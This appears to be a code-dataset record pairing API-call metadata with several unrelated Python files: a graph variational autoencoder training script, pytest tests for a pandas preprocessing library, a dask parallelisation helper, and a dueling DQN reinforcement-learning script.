[((366, 456), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Measure and save max power point tracking data"""'}), "(description=\n 'Measure and save max power point tracking data')\n", (389, 456), False, 'import argparse\n'), ((1727, 1747), 'numpy.absolute', 'np.absolute', (['V_start'], {}), '(V_start)\n', (1738, 1747), True, 'import numpy as np\n'), ((1914, 1938), 'pyvisa.ResourceManager', 'pyvisa.ResourceManager', ([], {}), '()\n', (1936, 1938), False, 'import pyvisa\n'), ((3865, 3876), 'time.time', 'time.time', ([], {}), '()\n', (3874, 3876), False, 'import time\n'), ((3885, 3896), 'time.time', 'time.time', ([], {}), '()\n', (3894, 3896), False, 'import time\n'), ((4355, 4366), 'time.time', 'time.time', ([], {}), '()\n', (4364, 4366), False, 'import time\n'), ((4948, 4959), 'time.time', 'time.time', ([], {}), '()\n', (4957, 4959), False, 'import time\n'), ((5457, 5479), 'numpy.array', 'np.array', (['mppt_results'], {}), '(mppt_results)\n', (5465, 5479), True, 'import numpy as np\n'), ((4291, 4341), 'numpy.absolute', 'np.absolute', (['(data[0] * data[1] * 1000 / (suns * A))'], {}), '(data[0] * data[1] * 1000 / (suns * A))\n', (4302, 4341), True, 'import numpy as np\n'), ((4884, 4934), 'numpy.absolute', 'np.absolute', (['(data[0] * data[1] * 1000 / (suns * A))'], {}), '(data[0] * data[1] * 1000 / (suns * A))\n', (4895, 4934), True, 'import numpy as np\n')]
|
from __future__ import division
from __future__ import print_function
from evaluation import get_roc_score, clustering_latent_space
from input_data import load_adj_feature
from kcore import compute_kcore, expand_embedding
from model import *
from optimizer import OptimizerAE, OptimizerVAE
from preprocessing import *
import numpy as np
import os
import scipy.sparse as sp
import tensorflow as tf
import time
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
# tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
flags = tf.app.flags
FLAGS = flags.FLAGS
# Select graph dataset
flags.DEFINE_string('dataset', 'Cross-talk', 'Name of the graph dataset')
# Select machine learning task to perform on graph
flags.DEFINE_string('task', 'link_prediction', 'Name of the learning task')
# Model
flags.DEFINE_string('model', 'linear_vae', 'Name of the model')
# Model parameters
flags.DEFINE_float('dropout', 0., 'Dropout rate (1 - keep probability).')
flags.DEFINE_integer('epochs', 1000, 'Number of epochs in training.')
flags.DEFINE_boolean('features', True, 'Include node features or not in encoder')
flags.DEFINE_float('learning_rate', 0.05, 'Initial learning rate (with Adam)')
flags.DEFINE_integer('hidden', 64, 'Number of units in GCN hidden layer(s).')
flags.DEFINE_integer('dimension', 128, 'Dimension of encoder output, i.e. \
embedding dimension')
# Experimental setup parameters
flags.DEFINE_integer('nb_run', 1, 'Number of model run + test')
flags.DEFINE_float('prop_val', 5., 'Proportion of edges in validation set \
(for Link Prediction task)')
flags.DEFINE_float('prop_test', 10., 'Proportion of edges in test set \
(for Link Prediction task)')
flags.DEFINE_boolean('validation', False, 'Whether to report validation \
results at each epoch (for \
Link Prediction task)')
flags.DEFINE_boolean('verbose', True, 'Whether to print comments details.')
flags.DEFINE_boolean('kcore', False, 'Whether to run k-core decomposition \
and use the framework. False = model \
will be trained on the entire graph')
flags.DEFINE_integer('k', 2, 'Which k-core to use. Higher k => smaller graphs\
and faster (but maybe less accurate) training')
flags.DEFINE_integer('nb_iterations', 10, 'Number of fix point iterations in \
algorithm 2 of IJCAI paper. See \
kcore.py file for details')
# Lists to collect average results
if FLAGS.task == 'link_prediction':
mean_roc = []
mean_ap = []
if FLAGS.kcore:
mean_time_kcore = []
mean_time_train = []
mean_time_expand = []
mean_core_size = []
mean_time = []
# Load graph dataset
if FLAGS.verbose:
print("Loading data...")
if FLAGS.dataset == 'Cross-talk':
adj_init, features_init = load_adj_feature('../Cross-talk/Fegs_1.npy',
'../Cross-talk/Cross-talk_Matrix.txt')
else:
adj_init, features_init = load_data(FLAGS.dataset)
print(type(adj_init), type(features_init))
# The entire training+test process is repeated FLAGS.nb_run times
for i in range(FLAGS.nb_run):
if FLAGS.task == 'link_prediction':
if FLAGS.verbose:
print("Masking test edges...")
# Edge Masking for Link Prediction: compute Train/Validation/Test set
adj, val_edges, val_edges_false, test_edges, test_edges_false = \
mask_test_edges(adj_init, FLAGS.prop_test, FLAGS.prop_val)
elif FLAGS.task == 'node_clustering':
adj_tri = sp.triu(adj_init)
adj = adj_tri + adj_tri.T
else:
raise ValueError('Undefined task!')
# Start computation of running times
t_start = time.time()
# Degeneracy Framework / K-Core Decomposition
if FLAGS.kcore:
if FLAGS.verbose:
print("Starting k-core decomposition of the graph")
# Save adjacency matrix of un-decomposed graph
# (needed to embed nodes that are not in k-core, after GAE training)
adj_orig = adj
# Get the (smaller) adjacency matrix of the k-core subgraph,
# and the corresponding nodes
adj, nodes_kcore = compute_kcore(adj, FLAGS.k)
# Get the (smaller) feature matrix of the nb_core graph
if FLAGS.features:
features = features_init[nodes_kcore, :]
# Flag to compute k-core decomposition's running time
t_core = time.time()
elif FLAGS.features:
features = features_init
# Preprocessing and initialization
if FLAGS.verbose:
print("Preprocessing and Initializing...")
# Compute number of nodes
num_nodes = adj.shape[0]
# If features are not used, replace feature matrix by identity matrix
if not FLAGS.features:
features = sp.identity(adj.shape[0])
# Preprocessing on node features
features = sparse_to_tuple(features)
num_features = features[2][1]
features_nonzero = features[1].shape[0]
# Define placeholders
placeholders = {
'features': tf.sparse_placeholder(tf.float32),
'adj': tf.sparse_placeholder(tf.float32),
'adj_orig': tf.sparse_placeholder(tf.float32),
'dropout': tf.placeholder_with_default(0., shape=())
}
# Create model
model = None
# Linear Graph Variational Autoencoder
model = LinearModelVAE(placeholders, num_features, num_nodes,
features_nonzero)
# Optimizer
pos_weight = float(adj.shape[0] * adj.shape[0] - adj.sum()) / adj.sum()
norm = adj.shape[0] * adj.shape[0] / float((adj.shape[0] * adj.shape[0]
- adj.sum()) * 2)
with tf.name_scope('optimizer'):
# Optimizer for Non-Variational Autoencoders
opt = OptimizerVAE(preds=model.reconstructions,
labels=tf.reshape(tf.sparse_tensor_to_dense(placeholders['adj_orig'],
validate_indices=False), [-1]),
model=model,
num_nodes=num_nodes,
pos_weight=pos_weight,
norm=norm)
# Normalization and preprocessing on adjacency matrix
adj_norm = preprocess_graph(adj)
adj_label = sparse_to_tuple(adj + sp.eye(adj.shape[0]))
# Initialize TF session
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# Model training
if FLAGS.verbose:
print("Training...")
for epoch in range(FLAGS.epochs):
# Flag to compute running time for each epoch
t = time.time()
# Construct feed dictionary
feed_dict = construct_feed_dict(adj_norm, adj_label, features,
placeholders)
feed_dict.update({placeholders['dropout']: FLAGS.dropout})
# Weights update
outs = sess.run([opt.opt_op, opt.cost, opt.accuracy],
feed_dict=feed_dict)
# Compute average loss
avg_cost = outs[1]
if FLAGS.verbose:
# Display epoch information
print("Epoch:", '%04d' % (epoch + 1), "train_loss=", "{:.5f}".format(avg_cost),
"time=", "{:.5f}".format(time.time() - t))
# Validation, for Link Prediction
if not FLAGS.kcore and FLAGS.validation and FLAGS.task == 'link_prediction':
feed_dict.update({placeholders['dropout']: 0})
emb = sess.run(model.z_mean, feed_dict=feed_dict)
feed_dict.update({placeholders['dropout']: FLAGS.dropout})
val_roc, val_ap = get_roc_score(val_edges, val_edges_false, emb)
print("val_roc=", "{:.5f}".format(val_roc), "val_ap=", "{:.5f}".format(val_ap))
# Flag to compute Graph AE/VAE training time
t_model = time.time()
# Compute embedding
# Get embedding from model
emb = sess.run(model.z_mean, feed_dict=feed_dict)
# If k-core is used, only part of the nodes from the original
# graph are embedded. The remaining ones are projected in the
# latent space via the expand_embedding heuristic
if FLAGS.kcore:
if FLAGS.verbose:
print("Propagation to remaining nodes...")
# Project remaining nodes in latent space
emb = expand_embedding(adj_orig, emb, nodes_kcore, FLAGS.nb_iterations)
# Compute mean running times for K-Core, GAE Train and Propagation steps
mean_time_expand.append(time.time() - t_model)
mean_time_train.append(t_model - t_core)
mean_time_kcore.append(t_core - t_start)
# Compute mean size of K-Core graph
# Note: size is fixed if task is node clustering, but will vary if
# task is link prediction due to edge masking
mean_core_size.append(len(nodes_kcore))
# Compute mean total running time
mean_time.append(time.time() - t_start)
print(type(emb))
np.save('../Cross-talk/Cross_talk_gcn_features128_FEGS.npy', emb)
# Test model
if FLAGS.verbose:
print("Testing model...")
# Link Prediction: classification edges/non-edges
# Get ROC and AP scores
roc_score, ap_score = get_roc_score(test_edges, test_edges_false, emb)
# Report scores
mean_roc.append(roc_score)
mean_ap.append(ap_score)
###### Report Final Results ######
# Report final results
print("\nTest results for", FLAGS.model,
"model on", FLAGS.dataset, "on", FLAGS.task, "\n",
"___________________________________________________\n")
if FLAGS.task == 'link_prediction':
print("AUC scores\n", mean_roc)
print("Mean AUC score: ", np.mean(mean_roc),
"\nStd of AUC scores: ", np.std(mean_roc), "\n \n")
print("AP scores\n", mean_ap)
print("Mean AP score: ", np.mean(mean_ap),
"\nStd of AP scores: ", np.std(mean_ap), "\n \n")
else:
print("Adjusted MI scores\n", mean_mutual_info)
print("Mean Adjusted MI score: ", np.mean(mean_mutual_info),
"\nStd of Adjusted MI scores: ", np.std(mean_mutual_info), "\n \n")
print("Total Running times\n", mean_time)
print("Mean total running time: ", np.mean(mean_time),
"\nStd of total running time: ", np.std(mean_time), "\n \n")
|
[
"numpy.save",
"kcore.expand_embedding",
"numpy.std",
"tensorflow.global_variables_initializer",
"tensorflow.placeholder_with_default",
"tensorflow.sparse_tensor_to_dense",
"tensorflow.Session",
"kcore.compute_kcore",
"time.time",
"scipy.sparse.triu",
"numpy.mean",
"input_data.load_adj_feature",
"scipy.sparse.identity",
"evaluation.get_roc_score",
"tensorflow.sparse_placeholder",
"tensorflow.name_scope",
"scipy.sparse.eye"
] |
[((3122, 3209), 'input_data.load_adj_feature', 'load_adj_feature', (['"""../Cross-talk/Fegs_1.npy"""', '"""../Cross-talk/Cross-talk_Matrix.txt"""'], {}), "('../Cross-talk/Fegs_1.npy',\n '../Cross-talk/Cross-talk_Matrix.txt')\n", (3138, 3209), False, 'from input_data import load_adj_feature\n'), ((4033, 4044), 'time.time', 'time.time', ([], {}), '()\n', (4042, 4044), False, 'import time\n'), ((6779, 6791), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (6789, 6791), True, 'import tensorflow as tf\n'), ((8279, 8290), 'time.time', 'time.time', ([], {}), '()\n', (8288, 8290), False, 'import time\n'), ((9412, 9477), 'numpy.save', 'np.save', (['"""../Cross-talk/Cross_talk_gcn_features128_FEGS.npy"""', 'emb'], {}), "('../Cross-talk/Cross_talk_gcn_features128_FEGS.npy', emb)\n", (9419, 9477), True, 'import numpy as np\n'), ((9667, 9715), 'evaluation.get_roc_score', 'get_roc_score', (['test_edges', 'test_edges_false', 'emb'], {}), '(test_edges, test_edges_false, emb)\n', (9680, 9715), False, 'from evaluation import get_roc_score, clustering_latent_space\n'), ((10650, 10668), 'numpy.mean', 'np.mean', (['mean_time'], {}), '(mean_time)\n', (10657, 10668), True, 'import numpy as np\n'), ((10710, 10727), 'numpy.std', 'np.std', (['mean_time'], {}), '(mean_time)\n', (10716, 10727), True, 'import numpy as np\n'), ((4506, 4533), 'kcore.compute_kcore', 'compute_kcore', (['adj', 'FLAGS.k'], {}), '(adj, FLAGS.k)\n', (4519, 4533), False, 'from kcore import compute_kcore, expand_embedding\n'), ((4762, 4773), 'time.time', 'time.time', ([], {}), '()\n', (4771, 4773), False, 'import time\n'), ((5135, 5160), 'scipy.sparse.identity', 'sp.identity', (['adj.shape[0]'], {}), '(adj.shape[0])\n', (5146, 5160), True, 'import scipy.sparse as sp\n'), ((5393, 5426), 'tensorflow.sparse_placeholder', 'tf.sparse_placeholder', (['tf.float32'], {}), '(tf.float32)\n', (5414, 5426), True, 'import tensorflow as tf\n'), ((5444, 5477), 'tensorflow.sparse_placeholder', 'tf.sparse_placeholder', (['tf.float32'], {}), '(tf.float32)\n', (5465, 5477), True, 'import tensorflow as tf\n'), ((5500, 5533), 'tensorflow.sparse_placeholder', 'tf.sparse_placeholder', (['tf.float32'], {}), '(tf.float32)\n', (5521, 5533), True, 'import tensorflow as tf\n'), ((5555, 5597), 'tensorflow.placeholder_with_default', 'tf.placeholder_with_default', (['(0.0)'], {'shape': '()'}), '(0.0, shape=())\n', (5582, 5597), True, 'import tensorflow as tf\n'), ((6055, 6081), 'tensorflow.name_scope', 'tf.name_scope', (['"""optimizer"""'], {}), "('optimizer')\n", (6068, 6081), True, 'import tensorflow as tf\n'), ((6806, 6839), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (6837, 6839), True, 'import tensorflow as tf\n'), ((7027, 7038), 'time.time', 'time.time', ([], {}), '()\n', (7036, 7038), False, 'import time\n'), ((8768, 8833), 'kcore.expand_embedding', 'expand_embedding', (['adj_orig', 'emb', 'nodes_kcore', 'FLAGS.nb_iterations'], {}), '(adj_orig, emb, nodes_kcore, FLAGS.nb_iterations)\n', (8784, 8833), False, 'from kcore import compute_kcore, expand_embedding\n'), ((10134, 10151), 'numpy.mean', 'np.mean', (['mean_roc'], {}), '(mean_roc)\n', (10141, 10151), True, 'import numpy as np\n'), ((10189, 10205), 'numpy.std', 'np.std', (['mean_roc'], {}), '(mean_roc)\n', (10195, 10205), True, 'import numpy as np\n'), ((10283, 10299), 'numpy.mean', 'np.mean', (['mean_ap'], {}), '(mean_ap)\n', (10290, 10299), True, 'import numpy as np\n'), ((10336, 10351), 'numpy.std', 'np.std', (['mean_ap'], {}), '(mean_ap)\n', (10342, 10351), True, 'import numpy as np\n'), ((10463, 10488), 'numpy.mean', 'np.mean', (['mean_mutual_info'], {}), '(mean_mutual_info)\n', (10470, 10488), True, 'import numpy as np\n'), ((10534, 10558), 'numpy.std', 'np.std', (['mean_mutual_info'], {}), '(mean_mutual_info)\n', (10540, 10558), True, 'import numpy as np\n'), ((3865, 3882), 'scipy.sparse.triu', 'sp.triu', (['adj_init'], {}), '(adj_init)\n', (3872, 3882), True, 'import scipy.sparse as sp\n'), ((6714, 6734), 'scipy.sparse.eye', 'sp.eye', (['adj.shape[0]'], {}), '(adj.shape[0])\n', (6720, 6734), True, 'import scipy.sparse as sp\n'), ((9360, 9371), 'time.time', 'time.time', ([], {}), '()\n', (9369, 9371), False, 'import time\n'), ((8068, 8114), 'evaluation.get_roc_score', 'get_roc_score', (['val_edges', 'val_edges_false', 'emb'], {}), '(val_edges, val_edges_false, emb)\n', (8081, 8114), False, 'from evaluation import get_roc_score, clustering_latent_space\n'), ((8949, 8960), 'time.time', 'time.time', ([], {}), '()\n', (8958, 8960), False, 'import time\n'), ((6240, 6315), 'tensorflow.sparse_tensor_to_dense', 'tf.sparse_tensor_to_dense', (["placeholders['adj_orig']"], {'validate_indices': '(False)'}), "(placeholders['adj_orig'], validate_indices=False)\n", (6265, 6315), True, 'import tensorflow as tf\n'), ((7671, 7682), 'time.time', 'time.time', ([], {}), '()\n', (7680, 7682), False, 'import time\n')]
|
import numpy as np
import pandas as pd
from dstk.preprocessing import (onehot_encode,
mark_binary,
nan_to_binary,
num_to_str)
# Create test data
df = pd.DataFrame()
df['numeric1'] = [0, 1, 0, 0, 1, 1]
df['numeric2'] = [1.0, 3.4, 5.4, 2.3, 3.1, 4.1]
df['numericNaN'] = [1, 2, 3, None, 3, None]
df['cat1'] = ['a', 'a', 'b', 'c', 'c', 'a']
df['catNaN'] = ['A', 'B', None, None, 'B', 'C']
# Test for num_to_str function
def test_numtostr():
# Test for converting column type to object
test = num_to_str(df, ['numeric1'])
assert test['numeric1'].dtype == 'O'
def test_numtostr_inplace():
# Test for converting column to object in place
df2 = df.copy()
num_to_str(df2, ['numeric1'], inplace=True)
assert df2['numeric1'].dtype == 'O'
# Tests for nan_to_binary function
def test_nantobinary_inplaceTrue():
# Test for converting dataframe in place
df2 = df.copy()
nan_to_binary(df2, ['numericNaN'], inplace=True)
assert df2['binary#numericNaN'].tolist() == [0, 0, 0, 1, 0, 1]
def test_nantobinary_featureselect():
# Test for converting specified features
test = nan_to_binary(df, ['numericNaN'])
assert test['binary#numericNaN'].tolist() == [0, 0, 0, 1, 0, 1]
def test_nantobinary_auto():
# Test for auto converting columns with NaN > threshold
test = nan_to_binary(df)
assert test['binary#catNaN'].tolist() == [0, 0, 1, 1, 0, 0]
def test_nantobinary_threshold():
# Test for auto converting columns with NaN > specified threshold
test = nan_to_binary(df, threshold=0.5, inplace=False)
assert test.loc[2, 'catNaN'] == None
# Tests for markbinary function
def test_markbinary_inplaceFalse():
# Test for not transforming df in place
test = mark_binary(df, inplace=False)
assert test.columns.tolist()[0] == 'binary#numeric1'
def test_markbinary_inplaceTrue():
# Test for transforming df in place
df2 = df.copy()
mark_binary(df2, inplace=True)
assert df2.columns.tolist()[0] == 'binary#numeric1'
def test_markbinary_inplaceTrue_selectfeature():
# Test for selecting specific features to mark
df2 = df.copy()
mark_binary(df2, ['numeric1'], inplace=True)
assert df2.columns.tolist()[0] == 'binary#numeric1'
# Tests for onehotencode wrapper
def test_onehot_checkprefix():
# Test whether prefixes are created correctly
test = onehot_encode(df)
assert test.columns.tolist() == ['numeric1',
'numeric2',
'numericNaN',
'binary#cat1_b',
'binary#cat1_c',
'binary#catNaN_B',
'binary#catNaN_C',
'binary#catNaN_nan']
def test_onehot_selectfeature():
# Test whether subselection of features is correct
test = onehot_encode(df, features=['cat1'])
assert test.columns.tolist() == ['numeric1',
'numeric2',
'numericNaN',
'catNaN',
'binary#cat1_b',
'binary#cat1_c']
def test_onehot_retainNaNs():
# Test whether nans are retained
test = onehot_encode(df, impute='retain')
assert np.isnan(test['binary#catNaN_B']).tolist() == [
False, False, True, True, False, False]
def test_onehot_modeimputeNaNs():
# Test mode imputing NaNs
test = onehot_encode(df, impute='mode')
assert test['binary#catNaN_B'].tolist() == [0, 1, 1, 1, 1, 0]
def test_onehot_trackNaNs():
# Test whether nans are tracked in separate column
test = onehot_encode(df)
assert test['binary#catNaN_nan'].tolist() == [0, 0, 1, 1, 0, 0]
def test_onehot_drop_zerovar():
# Test whether zero variance columns are dropped
df['cat2'] = ['a', 'a', 'a', 'a', 'a', 'a']
test = onehot_encode(df)
assert test.columns.tolist() == ['numeric1',
'numeric2',
'numericNaN',
'binary#cat1_b',
'binary#cat1_c',
'binary#catNaN_B',
'binary#catNaN_C',
'binary#catNaN_nan']
|
[
"pandas.DataFrame",
"dstk.preprocessing.nan_to_binary",
"numpy.isnan",
"dstk.preprocessing.onehot_encode",
"dstk.preprocessing.num_to_str",
"dstk.preprocessing.mark_binary"
] |
[((248, 262), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (260, 262), True, 'import pandas as pd\n'), ((597, 625), 'dstk.preprocessing.num_to_str', 'num_to_str', (['df', "['numeric1']"], {}), "(df, ['numeric1'])\n", (607, 625), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((774, 817), 'dstk.preprocessing.num_to_str', 'num_to_str', (['df2', "['numeric1']"], {'inplace': '(True)'}), "(df2, ['numeric1'], inplace=True)\n", (784, 817), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1001, 1049), 'dstk.preprocessing.nan_to_binary', 'nan_to_binary', (['df2', "['numericNaN']"], {'inplace': '(True)'}), "(df2, ['numericNaN'], inplace=True)\n", (1014, 1049), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1213, 1246), 'dstk.preprocessing.nan_to_binary', 'nan_to_binary', (['df', "['numericNaN']"], {}), "(df, ['numericNaN'])\n", (1226, 1246), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1417, 1434), 'dstk.preprocessing.nan_to_binary', 'nan_to_binary', (['df'], {}), '(df)\n', (1430, 1434), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1616, 1663), 'dstk.preprocessing.nan_to_binary', 'nan_to_binary', (['df'], {'threshold': '(0.5)', 'inplace': '(False)'}), '(df, threshold=0.5, inplace=False)\n', (1629, 1663), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1831, 1861), 'dstk.preprocessing.mark_binary', 'mark_binary', (['df'], {'inplace': '(False)'}), '(df, inplace=False)\n', (1842, 1861), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((2020, 2050), 'dstk.preprocessing.mark_binary', 'mark_binary', (['df2'], {'inplace': '(True)'}), '(df2, inplace=True)\n', (2031, 2050), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((2234, 2278), 'dstk.preprocessing.mark_binary', 'mark_binary', (['df2', "['numeric1']"], {'inplace': '(True)'}), "(df2, ['numeric1'], inplace=True)\n", (2245, 2278), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((2463, 2480), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {}), '(df)\n', (2476, 2480), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3009, 3045), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {'features': "['cat1']"}), "(df, features=['cat1'])\n", (3022, 3045), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3430, 3464), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {'impute': '"""retain"""'}), "(df, impute='retain')\n", (3443, 3464), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3649, 3681), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {'impute': '"""mode"""'}), "(df, impute='mode')\n", (3662, 3681), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3845, 3862), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {}), '(df)\n', (3858, 3862), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((4077, 4094), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {}), '(df)\n', (4090, 4094), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3476, 3509), 'numpy.isnan', 'np.isnan', (["test['binary#catNaN_B']"], {}), "(test['binary#catNaN_B'])\n", (3484, 3509), True, 'import numpy as np\n')]
|
"""Utilities for multiprocessing."""
from contextlib import contextmanager
import logging
import time
from dask.distributed import Client, LocalCluster, progress
from dask_jobqueue import PBSCluster
import numpy as np
_logger = logging.getLogger(__name__)
def map_function(function, function_args, pbs=False, **cluster_kwargs):
"""Parallize `function` over `function_args` across available CPUs.
Utilizes dask.distributed.Client.map which follows the implementation of built-in
`map`. See https://docs.python.org/3/library/functions.html#map and
https://distributed.dask.org/en/latest/client.html.
Examples
--------
```
def add(x, y):
return x + y
xs = [1, 2, 3, 4]
ys = [11, 12, 13, 14]
map_function(add, [xs, ys]) => [12, 14, 16, 18]
```
Parameters
----------
function : function | method
function_args : list
If `function` takes multiple args, follow implementation of `map`. Namely, if
f(x1, x2) => y, then `function_args` should be `[all_x1, all_x2]`.
pbs : bool, optional
Whether or not to create a PBS job over whose cluster to parallize, by default
False.
Returns
-------
list
"""
_logger.info(
"Running %s in parallel with args of shape %s",
function.__name__,
np.shape(function_args),
)
with dask_client(pbs=pbs, **cluster_kwargs) as client:
if len(np.shape(function_args)) == 1:
function_args = [function_args]
futures = client.map(function, *function_args)
progress(futures)
return_values = client.gather(futures)
return return_values
@contextmanager
def dask_client(pbs=False, **cluster_kwargs):
"""Context manager surrounding a dask client. Handles closing upon completion.
Examples
--------
```
with dask_client() as client:
client.do_something()
```
Parameters
----------
pbs: bool, optional
Whether or not dask should submit a PBS job over whose cluster to operate.
**cluster_kwargs:
Arguments to either `PBSCluster` or `LocalCluster` which are pretty much the
same. Some usefule arguments include:
- n_workers
- cores
- interface
- memory
- walltime
"""
if pbs:
cluster = PBSCluster(**cluster_kwargs)
if "n_workers" not in cluster_kwargs:
cluster.scale(1)
else:
cluster = LocalCluster(processes=False, **cluster_kwargs)
client = Client(cluster)
client.wait_for_workers(n_workers=1)
time.sleep(5)
try:
_logger.info("Dask Cluster: %s\nDask Client: %s", cluster, client)
yield client
finally:
client.close()
cluster.close()
_logger.info("Closed client and cluster")
def flatten_array(arr):
"""Flatten an array by 1 dimension."""
shape = np.array(arr).shape
if len(shape) == 1:
return arr
return [item for list_1d in arr for item in list_1d]
|
[
"dask.distributed.Client",
"dask.distributed.LocalCluster",
"time.sleep",
"numpy.shape",
"dask.distributed.progress",
"numpy.array",
"dask_jobqueue.PBSCluster",
"logging.getLogger"
] |
[((230, 257), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (247, 257), False, 'import logging\n'), ((2557, 2572), 'dask.distributed.Client', 'Client', (['cluster'], {}), '(cluster)\n', (2563, 2572), False, 'from dask.distributed import Client, LocalCluster, progress\n'), ((2619, 2632), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2629, 2632), False, 'import time\n'), ((1333, 1356), 'numpy.shape', 'np.shape', (['function_args'], {}), '(function_args)\n', (1341, 1356), True, 'import numpy as np\n'), ((1577, 1594), 'dask.distributed.progress', 'progress', (['futures'], {}), '(futures)\n', (1585, 1594), False, 'from dask.distributed import Client, LocalCluster, progress\n'), ((2363, 2391), 'dask_jobqueue.PBSCluster', 'PBSCluster', ([], {}), '(**cluster_kwargs)\n', (2373, 2391), False, 'from dask_jobqueue import PBSCluster\n'), ((2495, 2542), 'dask.distributed.LocalCluster', 'LocalCluster', ([], {'processes': '(False)'}), '(processes=False, **cluster_kwargs)\n', (2507, 2542), False, 'from dask.distributed import Client, LocalCluster, progress\n'), ((2930, 2943), 'numpy.array', 'np.array', (['arr'], {}), '(arr)\n', (2938, 2943), True, 'import numpy as np\n'), ((1438, 1461), 'numpy.shape', 'np.shape', (['function_args'], {}), '(function_args)\n', (1446, 1461), True, 'import numpy as np\n')]
|
import numpy as np
import gym
import gym_carsim
from gym import spaces
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten
from keras.optimizers import Adam
from rl.agents.dqn import DQNAgent
from rl.policy import BoltzmannQPolicy
from rl.memory import SequentialMemory
ENV_NAME = 'carsim-v0'
class WrapThreeFrames(gym.Wrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = spaces.Box(low=0.0, high=1.0, shape=(9,))
self.past_obs = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
def shift_past_obs(self, new_obs):
self.past_obs = self.past_obs[3:]+new_obs
return self.past_obs
def reset(self):
obs = self.env.reset()
return self.shift_past_obs(obs)
def step(self, action):
obs, reward, done, info = self.env.step(action)
return self.shift_past_obs(obs), reward, done, info
# Get the environment and extract the number of actions.
env = gym.make(ENV_NAME)
env = WrapThreeFrames(env)
np.random.seed(98283476)
env.seed(87518645)
nb_actions = env.action_space.n
# Next, we build a very simple model regardless of the dueling architecture
# if you enable dueling network in DQN , DQN will build a dueling network base on your model automatically
# Also, you can build a dueling network by yourself and turn off the dueling network in DQN.
model = Sequential()
model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(nb_actions, activation='sigmoid'))
print(model.summary())
# Finally, we configure and compile our agent. You can use every built-in Keras optimizer and
# even the metrics!
memory = SequentialMemory(limit=50000, window_length=1)
policy = BoltzmannQPolicy()
# enable the dueling network
# you can specify the dueling_type to one of {'avg','max','naive'}
dqn = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=100,
enable_dueling_network=True, dueling_type='avg', target_model_update=1e-2, policy=policy)
dqn.compile(Adam(lr=1e-3), metrics=['mae'])
# Okay, now it's time to learn something! We visualize the training here for show, but this
# slows down training quite a lot. You can always safely abort the training prematurely using
# Ctrl + C.
dqn.fit(env, nb_steps=50000, visualize=False, verbose=2)
# After training is done, we save the final weights.
dqn.save_weights('duel_dqn_{}_weights.h5f'.format(ENV_NAME), overwrite=True)
#dqn.load_weights('duel_dqn_{}_weights.h5f'.format(ENV_NAME))
# Finally, evaluate our algorithm for 5 episodes.
print(dqn.test(env, nb_episodes=5, nb_max_episode_steps=10000, visualize=True))
|
[
"rl.memory.SequentialMemory",
"rl.agents.dqn.DQNAgent",
"numpy.random.seed",
"gym.make",
"keras.layers.Activation",
"keras.layers.Flatten",
"rl.policy.BoltzmannQPolicy",
"keras.optimizers.Adam",
"gym.ObservationWrapper.__init__",
"keras.layers.Dense",
"gym.spaces.Box",
"keras.models.Sequential"
] |
